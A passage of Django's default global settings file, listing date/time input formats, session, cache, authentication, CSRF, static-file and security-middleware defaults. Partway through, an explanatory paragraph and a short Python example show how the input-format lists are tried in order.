# Default formatting for date objects when only the year and month are relevant.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
YEAR_MONTH_FORMAT = 'F Y'
# Default formatting for date objects when only the month and day are relevant.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
MONTH_DAY_FORMAT = 'F j'
# Default short formatting for date objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
SHORT_DATE_FORMAT = 'm/d/Y'
# Default short formatting for datetime objects.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
SHORT_DATETIME_FORMAT = 'm/d/Y P'
# Default formats to be used when parsing dates from input boxes, in order
# See all available format strings here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
DATE_INPUT_FORMATS = [
'%Y-%m-%d', '%m/%d/%Y', '%m/%d/%y', # '2006-10-25', '10/25/2006', '10/25/06'
'%b %d %Y', '%b %d, %Y', # 'Oct 25 2006', 'Oct 25, 2006'
'%d %b %Y', '%d %b, %Y', # '25 Oct 2006', '25 Oct, 2006'
'%B %d %Y', '%B %d, %Y', # 'October 25 2006', 'October 25, 2006'
'%d %B %Y', '%d %B, %Y', # '25 October 2006', '25 October, 2006'
]
# Default formats to be used when parsing times from input boxes, in order
# See all available format strings here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
TIME_INPUT_FORMATS = [
'%H:%M:%S', # '14:30:59'
'%H:%M:%S.%f', # '14:30:59.000200'
'%H:%M', # '14:30'
]
# Default formats to be used when parsing dates and times from input boxes,
# in order
# See all available format strings here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
DATETIME_INPUT_FORMATS = [
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%m/%d/%Y %H:%M:%S', # '10/25/2006 14:30:59'
'%m/%d/%Y %H:%M:%S.%f', # '10/25/2006 14:30:59.000200'
'%m/%d/%Y %H:%M', # '10/25/2006 14:30'
'%m/%d/%Y', # '10/25/2006'
'%m/%d/%y %H:%M:%S', # '10/25/06 14:30:59'
'%m/%d/%y %H:%M:%S.%f', # '10/25/06 14:30:59.000200'
'%m/%d/%y %H:%M', # '10/25/06 14:30'
'%m/%d/%y', # '10/25/06'
]
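As an illustration (not part of Django's source), a format list like the one above is consumed by trying each strptime pattern in order until one parses; a minimal standalone sketch of that loop:

```python
from datetime import datetime

# Hypothetical helper mirroring how an input-format list is tried in order.
def parse_datetime_input(value, formats):
    for fmt in formats:
        try:
            return datetime.strptime(value, fmt)
        except ValueError:
            continue
    raise ValueError('no format matched %r' % value)

formats = ['%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M', '%m/%d/%Y']
print(parse_datetime_input('2006-10-25 14:30', formats))  # second pattern matches
print(parse_datetime_input('10/25/2006', formats))        # third pattern matches
```

Note these strptime patterns are for parsing input; display formatting uses the separate `DATE_FORMAT`-style strings documented earlier in this file.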
# First day of week, to be used on calendars
# 0 means Sunday, 1 means Monday...
FIRST_DAY_OF_WEEK = 0
# Decimal separator symbol
DECIMAL_SEPARATOR = '.'
# Boolean that sets whether to add thousand separator when formatting numbers
USE_THOUSAND_SEPARATOR = False
# Number of digits that will be together, when splitting them by
# THOUSAND_SEPARATOR. 0 means no grouping, 3 means splitting by thousands...
NUMBER_GROUPING = 0
# Thousand separator symbol
THOUSAND_SEPARATOR = ','
# The tablespaces to use for each model when not specified otherwise.
DEFAULT_TABLESPACE = ''
DEFAULT_INDEX_TABLESPACE = ''
# Default X-Frame-Options header value
X_FRAME_OPTIONS = 'SAMEORIGIN'
USE_X_FORWARDED_HOST = False
USE_X_FORWARDED_PORT = False
# The Python dotted path to the WSGI application that Django's internal server
# (runserver) will use. If `None`, the return value of
# 'django.core.wsgi.get_wsgi_application' is used, thus preserving the same
# behavior as previous versions of Django. Otherwise this should point to an
# actual WSGI application object.
WSGI_APPLICATION = None
# If your Django app is behind a proxy that sets a header to specify secure
# connections, AND that proxy ensures that user-submitted headers with the
# same name are ignored (so that people can't spoof it), set this value to
# a tuple of (header_name, header_value). For any requests that come in with
# that header/value, request.is_secure() will return True.
# WARNING! Only set this if you fully understand what you're doing. Otherwise,
# you may be opening yourself up to a security risk.
SECURE_PROXY_SSL_HEADER = None
##############
# MIDDLEWARE #
##############
# List of middleware to use. Order is important; in the request phase, these
# middleware will be applied in the order given, and in the response
# phase the middleware will be applied in reverse order.
MIDDLEWARE = []
############
# SESSIONS #
############
# Cache to store session data if using the cache session backend.
SESSION_CACHE_ALIAS = 'default'
# Cookie name. This can be whatever you want.
SESSION_COOKIE_NAME = 'sessionid'
# Age of cookie, in seconds (default: 2 weeks).
SESSION_COOKIE_AGE = 60 * 60 * 24 * 7 * 2
# A string like ".example.com", or None for standard domain cookie.
SESSION_COOKIE_DOMAIN = None
# Whether the session cookie should be secure (https:// only).
SESSION_COOKIE_SECURE = False
# The path of the session cookie.
SESSION_COOKIE_PATH = '/'
# Whether to use the non-RFC standard httpOnly flag (IE, FF3+, others)
SESSION_COOKIE_HTTPONLY = True
# Whether to save the session data on every request.
SESSION_SAVE_EVERY_REQUEST = False
# Whether a user's session cookie expires when the Web browser is closed.
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
# The module to store session data
SESSION_ENGINE = 'django.contrib.sessions.backends.db'
# Directory to store session files if using the file session module. If None,
# the backend will use a sensible default.
SESSION_FILE_PATH = None
# class to serialize session data
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
#########
# CACHE #
#########
# The cache backends to use.
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
CACHE_MIDDLEWARE_KEY_PREFIX = ''
CACHE_MIDDLEWARE_SECONDS = 600
CACHE_MIDDLEWARE_ALIAS = 'default'
##################
# AUTHENTICATION #
##################
AUTH_USER_MODEL = 'auth.User'
AUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.ModelBackend']
LOGIN_URL = '/accounts/login/'
LOGIN_REDIRECT_URL = '/accounts/profile/'
LOGOUT_REDIRECT_URL = None
# The number of days a password reset link is valid for
PASSWORD_RESET_TIMEOUT_DAYS = 3
# the first hasher in this list is the preferred algorithm. any
# password using different algorithms will be converted automatically
# upon login
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
]
AUTH_PASSWORD_VALIDATORS = []
###########
# SIGNING #
###########
SIGNING_BACKEND = 'django.core.signing.TimestampSigner'
########
# CSRF #
########
# Dotted path to callable to be used as view when a request is
# rejected by the CSRF middleware.
CSRF_FAILURE_VIEW = 'django.views.csrf.csrf_failure'
# Settings for CSRF cookie.
CSRF_COOKIE_NAME = 'csrftoken'
CSRF_COOKIE_AGE = 60 * 60 * 24 * 7 * 52
CSRF_COOKIE_DOMAIN = None
CSRF_COOKIE_PATH = '/'
CSRF_COOKIE_SECURE = False
CSRF_COOKIE_HTTPONLY = False
CSRF_HEADER_NAME = 'HTTP_X_CSRFTOKEN'
CSRF_TRUSTED_ORIGINS = []
CSRF_USE_SESSIONS = False
############
# MESSAGES #
############
# Class to use as messages backend
MESSAGE_STORAGE = 'django.contrib.messages.storage.fallback.FallbackStorage'
# Default values of MESSAGE_LEVEL and MESSAGE_TAGS are defined within
# django.contrib.messages to avoid imports in this settings file.
###########
# LOGGING #
###########
# The callable to use to configure logging
LOGGING_CONFIG = 'logging.config.dictConfig'
# Custom logging configuration.
LOGGING = {}
# Default exception reporter filter class used in case none has been
# specifically assigned to the HttpRequest instance.
DEFAULT_EXCEPTION_REPORTER_FILTER = 'django.views.debug.SafeExceptionReporterFilter'
###########
# TESTING #
###########
# The name of the class to use to run the test suite
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Apps that don't need to be serialized at test database creation time
# (only apps with migrations are to start with)
TEST_NON_SERIALIZED_APPS = []
############
# FIXTURES #
############
# The list of directories to search for fixtures
FIXTURE_DIRS = []
###############
# STATICFILES #
###############
# A list of locations of additional static files
STATICFILES_DIRS = []
# The default file storage backend used during the build process
STATICFILES_STORAGE = 'django.contrib.staticfiles.storage.StaticFilesStorage'
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
]
##############
# MIGRATIONS #
##############
# Migration module overrides for apps, by app label.
MIGRATION_MODULES = {}
#################
# SYSTEM CHECKS #
#################
# List of all issues generated by system checks that should be silenced. Light
# issues like warnings, infos or debugs will not generate a message. Silencing
# serious issues like errors and criticals does not result in hiding the
# message, but Django will not stop you from e.g. running the server.
SILENCED_SYSTEM_CHECKS = []
#######################
# SECURITY MIDDLEWARE #
#######################
SECURE_BROWSER_XSS_FILTER = False
SECURE_CONTENT_TYPE_NOSNIFF = False
SECURE_HSTS_INCLUDE_SUBDOMAINS = False
SECURE_HSTS_PRELOAD = False
SECURE_HSTS_SECONDS = 0
SECURE_REDIRECT_EXEMPT = []
SECURE_SSL_HOST = None
SECURE_SSL_REDIRECT = False
|